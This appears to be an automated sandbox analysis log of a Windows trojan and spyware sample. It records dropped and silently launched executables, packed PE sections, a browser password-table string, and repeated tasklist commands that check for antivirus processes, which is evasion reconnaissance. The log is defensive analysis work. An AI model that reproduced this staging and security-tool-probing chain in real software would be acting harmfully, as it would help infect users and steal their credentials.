Source: file.exe, 00000000.00000003.1815026080.00000000056F6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1812709980.000000000563C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814092591.000000000563E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1826620633.000000000563E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1815853388.0000000005705000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814644657.00000000056F7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1821797706.0000000005634000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1817653477.000000000563A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1831567791.000000000578B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813716556.00000000056E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819736652.0000000005641000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813041223.000000000576A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1816613279.000000000563F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818584165.000000000563A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814739226.000000000563F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1815445626.0000000005636000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819994662.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1834614494.0000000005637000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1815951863.0000000005633000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1817892373.0000000005637000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1816058078.0000000005709000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813816606.0000000005636000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820977945.000000000575F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819870917.000000000574F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819616059.0000000005850000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1815138348.0000000005632000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818812954.000000000583F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1819493125.0000000005741000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1813453155.0000000005637000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814279391.0000000005633000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1817305600.0000000005637000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1820238486.0000000005637000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1824670654.00000000058AA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1816510779.00000000057E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818458197.000000000582D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1828859580.000000000563E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1815675967.0000000005636000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1823558909.0000000005769000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1831355893.000000000563D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818249977.0000000005636000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1833794971.00000000007FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1814371504.00000000056F0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1817046006.0000000005637000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1816340672.0000000005710000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1833739536.000000000080A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1830816091.0000000005640000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1815348734.00000000057BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.1818147409.0000000005820000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9979366673197492
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982224965940054
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: Section: oibhsmco ZLIB complexity 0.9946630358807083
Source: skotes.exe.3.dr Static PE information: Section: ZLIB complexity 0.9982224965940054
Source: skotes.exe.3.dr Static PE information: Section: oibhsmco ZLIB complexity 0.9946630358807083
Source: random[1].exe.7.dr Static PE information: Section: ZLIB complexity 0.9979366673197492
Source: 9eba8044e7.exe.7.dr Static PE information: Section: ZLIB complexity 0.9979366673197492
Source: random[1].exe0.7.dr Static PE information: Section: jfbmubxy ZLIB complexity 0.9951572878925121
Source: 1553f88169.exe.7.dr Static PE information: Section: jfbmubxy ZLIB complexity 0.9951572878925121
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: Section: ZLIB complexity 0.9982224965940054
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: Section: oibhsmco ZLIB complexity 0.9946630358807083
Source: 7URDKE3CJSA37VV3INEEM0S4N1C.exe.59.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 9eba8044e7.exe.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe.7.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: KOLH45MMED0OMDDRYHIG.exe.0.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: skotes.exe.3.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@112/67@17/4
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FT773VWATWFL9SRK5RTU4.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3248:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: 9eba8044e7.exe, 0000003B.00000003.2590533647.0000000005E1E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 47%
Source: KOLH45MMED0OMDDRYHIG.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: FRtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeR
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe "C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe "C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe"
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe"
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Process created: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp "C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp" /SL5="$C0076,2820349,845824,C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Process created: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe Process created: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp "C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp" /SL5="$50284,2820349,845824,C:\Users\user\AppData\Local\Temp\1003142001\fontcreator.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Process created: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp "C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp" /SL5="$30472,2820349,845824,C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Process created: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe "C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe Process created: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp "C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp" /SL5="$40474,2820349,845824,C:\Users\user\AppData\Local\Temp\1003143001\fontcreator.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe "C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe"
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe "C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe" Jump to behavior
